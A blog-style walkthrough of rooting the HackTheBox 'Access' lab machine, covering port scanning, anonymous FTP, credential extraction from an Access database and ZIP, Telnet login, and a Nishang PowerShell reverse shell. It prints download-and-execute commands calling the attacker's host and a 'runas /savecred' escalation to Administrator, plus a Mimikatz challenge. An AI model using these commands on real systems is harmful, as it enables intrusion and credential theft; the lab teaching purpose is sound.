Hey buddies!
How are you doing?

This time I will show you how to root the ‘Access’ VM from HackTheBox.
Like other topics, I will focus on the methodology and the steps which were required to root the box on your own successfully.

Table of contents

1. Port scanning
2. Port filtering
3. Service enumeration
4. FTP
5. Telnet
6. HTTP
7. Analyse Microsoft Access Database
8. ZIP File extraction
9. Telnet Login
10. Reverse Shell through PowerShell
11. Local enumeration
12. Privilege Escalation
13. Challenge

Let’s begin.

1. Ping & Port Scanning

As always, I like to start to scan the machine just for open ports. We need an overview of our target. Because we don’t know how our target was configured, we should do small steps. So let us ping the machine.

ping -c 3 10.10.10.98

Notice the TTL (Time-To-Live) is 127. But what is TTL?
Do some research and try to find out on your own.
You should practice it!

When you find the information you need, then you can go forward.
But what do we need to know?

This is a great question and to become better, and it’s necessary to be able to find the solution on your own. So take a step back and create an overview for yourself. Also, you should ask yourself:
What do I need?
What is my goal (for this part!)?

It’s always easy if you see the solution. Every machine looks pretty easy if you know how to root it. The most difficult part of it is to find a way into it on your own.
So do some research before you continue.

---

Some useful resources you should find are:

Now we know that the OS is most likely a Windows.

Let us enumerate the open ports of this machine by using Nmap.
If you’re not familiar with Nmap, you should do some research. It is an essential tool which the most Penetration Testers are using.

Resource: https://nmap.org/

nmap 10.10.10.98 -Pn -n -p- --open -oN allports.nmap --stats-every 30s --max-retries 2 -T5

Alright, what do we have so far?

• OS: Windows (most likely)
• FTP
• Telnet
• HTTP

2. Port filtering

It’s possible that you will discover much more open ports on other machines and it could be a pain to type them manually.
Let us filter these by using Bash.

cat allports.nmap | grep tcp | cut -d"/" -f1 | tr “\n” “,” | sed ‘s/.$//g’

If you don’t understand the command, you can visit this site to get a better understanding of it: https://explainshell.com/

Now we can save the output of it in a variable.

PORTS=$(cat allports.nmap | grep tcp | cut -d"/" -f1 | tr “\n” “,” | sed ‘s/.$//g’)

To verify it looks great, we should ‘echo’ it.

echo $PORTS

And now we can proceed.

3. Service enumeration

Service enumeration is the part where we try to find out more information about the running services. Enumeration doesn’t mean only to collect as much information as possible moreover you have to create an overview based on all the information you had received.

Let us use Nmap for service scan and the Nmap Scripting Engine (NSE) to collect more information about the running services.

nmap 10.10.10.98 -p$PORTS -sV -sC -oN services.nmap --stats-every 30s --max-retries 2

So here is how our results look like:

Look at the information we’ve got so far closely.
Every information in this result is crucial for us.
You should append the info we just found out to our previous overview.

You also should notice the Telnet line. Take a closer look at it. What exactly do you see there?

There is a question mark. Right. What could this mean?
[Important] Train your research skills and try to find it out on your own.

Sometimes it can be essential to search for information like this little thing.

4. FTP

Let us take a look at the FTP server. You should notice from the previous Nmap scan that we have ‘Anonymous login allowed’. So let’s use it.

ftp 10.10.10.98

Credentials:
Name: anonymous
Password: anon

By looking into these directories, we found some interesting files.

Now we have to download it. I will show you two different methods you can do it.
We can use FTP with the ‘get’ command, or we use ‘wget’ to download these files.
But first, we have to still organised. So we create an FTP directory where we will store the files.

GET command

WGET

You should read the manual of ‘wget’ to understand the command and find out what PASV mode of an FTP server is.

Before we begin to analyse the files let us enumerate the other services too.

5. Telnet

Did you find out what the question mark means?
Now we will take a look at this service by using telnet.

telnet 10.10.10.98

You will notice that it will take a few seconds before the login prompt appears.
That is the reason for the question mark at the Nmap scan. Nmap couldn’t determine this service as Telnet because the response took to long. But because Telnet is basically on TCP port 23 it gave us the output of maybe it’s Telnet.

We don’t have any credentials to log in yet and to start bruteforcing this service just doesn’t make sense without any information of the ‘organisation’ or the machine we are trying to root. If we shouldn’t find any useful information than we can try to bruteforce it, but now let us take a look at the Web server.

6. HTTP

First, we should just interact with the Web server. Let us visit it.

Here we can download the image for later analysis.
Also, we want to know how the header looks like. Which ‘OPTIONS’ are allowed?.
The questions you should ask yourself:

• Are there some security headers?
• What kind of security headers exists?

Again, train your research skills and learn new things. Use all search engines and methods you know to find out the information you don’t know.

From this point, we want to spider the Web server to find out which directories on it exist.
Therefore we will use Burp Suite.
After setting up our Proxy-Settings and configure our target in Burp we can send another GET request to the Web server and intercept it. By sending it to spider in Burp, it will hopefully find some useful files or directories.

By clicking on Action you can send the request to Spider in Burp.
Burp Spider is a crawler which will be used to map a Web server (learn more).

Now our results look like we don’t have much here:

From here we can make another step and bruteforce the Web server with GET requests for different files and directories. There exist a lot of tools out there like gobuster, dirbuster, dirb and dirsearch.
At this example, I will use dirsearch. It isn’t installed in Kali Linux by default.
So here is the resource for dirsearch where you can download it.

You can download it by using the following command:

git clone https://github.com/maurosoria/dirsearch.git /opt/dirsearch/

Also, to make it globally executable you can create a symbolic link to /usr/local/bin/ .

ln -s /opt/dirsearch/dirsearch.py /usr/local/bin/dirsearch

By typing:

dirsearch -h

you will see all the options it has. Now let us enumerate the Web server with it.

dirsearch -u http://10.10.10.98 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 10 --max-retries=2 -e html,jpg,png,xml,aspx,asp,htm,asmx,dll,db

Unfortunately, nothing is interesting in the Web server. Another tool we can use is nikto.
This will provide us with a lot of information:

You should always note all of the information we collected so far during the process.

Let’s move on.

7. Microsoft Access Database

At this point, we should determine the file types of the files we are working with.
This could be done with a tool called ‘file’.

file Access\ Control.zip
file backup.mdb

Another method to find more information we can use ‘exiftool’.

Access Control.zip

backup.mdb

Notice that ‘exiftool’ couldn’t determine the file type. So we have to do it manually.

Ok Google: mdb file

On the first result page, you will be able to find this URL: https://fileinfo.com/extension/mdb
It provides us with the information we need.

I can’t repeat it often enough: note it!

Another question:

Ok, Google: extract mdb data kali

Here you will find a website called http://mdbtools.sourceforge.net/install/x53.htm.

By using ‘mdbtools’ we can work with this file. Let us take a look at how it does look inside.

mdb-tables backup.mdb

Ok. We have to structure it to make it easily readable.

We see the auth_user table inside. Let’s export the data from this table.

mdb-export backup.mdb auth_user | tr “,” " " | grep “\”" | cut -d" " -f2-3 | sed ‘s/\"//g’ | tr " " “:”

Also, we should save this information.

mdb-export backup.mdb auth_user | tr “,” " " | grep “\”" | cut -d" " -f2-3 | sed ‘s/\"//g’ | tr " " “:” > creds.txt

Another way we can use is the following:

mdb-export backup.mdb auth_user | tr “,” " " | column -t

8. ZIP File extraction

Next file is our ZIP archive. We want to know what’s inside of it.

unzip Access\ Control.zip

Do some research. Find out why this error appears.

7z -e Access\ Control.zip

Now it’s asking us for a password. Did we find some credentials already?
Let us try to use them:

We extracted a file called ‘Access Control.pst’. What kind of file is it?

file Access\ Control.pst

Find out a way on your own to read the content.

cat ‘Access Control.mbox’ | head -n 25

9. Telnet Login

At this point, we found other credentials which we can use.
Let us try to log in by using these.

telnet 10.10.10.98

We could successfully log in by using the credentials we found from the ZIP file.
Now it’s time for local enumeration, but first, it’s always better to work with a reverse shell.

Make sure you understand how a reverse shell works because it’s an essential part in this whole area.

10. Reverse Shell through PowerShell

But before we can obtain a reverse shell we have to plan it, understand how it should work and how the whole scenario of it will look like.
We have to force our target to connect back to us. …(cough) firewalls (cough)…

What do we need:

1. Reverse shell script
2. Web server
3. Listener
4. Execution command

1. Reverse shell Script

Nishang created an excellent collection of different PowerShell scripts. One of these we will use to obtain our reverse shell. We will copy it to our working directory.

We want to make sure that our target machine will execute it directly. Here we have to make some changes for that. By looking into the reverse shell script, we will see an example:

We will copy this line at the end of the file and remove the “PS >”. After these changes it will look like this:

2. Web server

There exist a lot of methods to share files. We will use this time a Python3 Web server module in the directory we stored our script.

python3 -m http.server 80

3. Listener

After that, we have to start our listener and listen on the port we set in the script before. In my case, it was the TCP port 2201. Therefore I will use Netcat.

nc -nlvp 2201

4. Execution command

The execution command for this will be:

C:\Users\security> powershell -c IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.5/revshell.ps1’)

11. Local enumeration

411Hall created an awesome enumeration PowerShell script called JAWS to identify privilege escalation vectors quickly.
We will let our target system download and execute it the same way we did it with the reverse shell.

It will take a few minutes. So don’t quit the session.
The most interesting part is this one:

Also, let us take a look at the desktop of the ‘security’ user.

So it seems we have here some stored credentials for the Administrator on this machine.
If we don’t know how to export them what else could we do?

12. Privilege Escalation

Let us ask Google:

Ok, Google: windows currently stored credentials privilege escalation

Also here on the first page, you will find a GitHub repository of swisskyrepo to his Windows - Privilege Escalation cheat sheet.
If we press CTRL+F and search for “stored credentials” you will see this example:

Ok. Do we need an EXE file or can we do something else?

What do you think about another reverse shell but this time with Administrator privileges?

Go back to 10. Reverse Shell through PowerShell if you don’t know how it does work or how it should look like. But I think this should be clear right now. It’s the same scenario in this situation.

1. We will just change the TCP port of our reverse shell script to 2202.
2. Run our python web server.
3. Set up our listener on TCP port 2202.
4. Execute it the same way with PowerShell with the currently stored credentials.

1. Reverse Shell Script

2. Web server

python3 -m http.server 80

3. Listener

nc -nlvp 2202

4. Execution command

PS C:\Users\security> runas /savecred /user:ACCESS\Administrator “powershell.exe IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.5/revshell.ps1’)”

12. Challenge

For this challenge, your goals will be

1. A Meterpreter session
2. Upload Mimikatz and read the credentials

Restrictions:

1. The usage of Empire or their scripts for this challenge is forbidden.

Have fun!

---

YouTube video coming soon!

Best regards,
Cry0l1t3

Official Website: https://www.shell-affect.com
Twitter: https://twitter.com/ShellAffect
Xing: https://www.xing.com/companies/shell-affect
YouTube: https://www.youtube.com/channel/UCgxyvJCaG1vRLM2GIpyBiWQ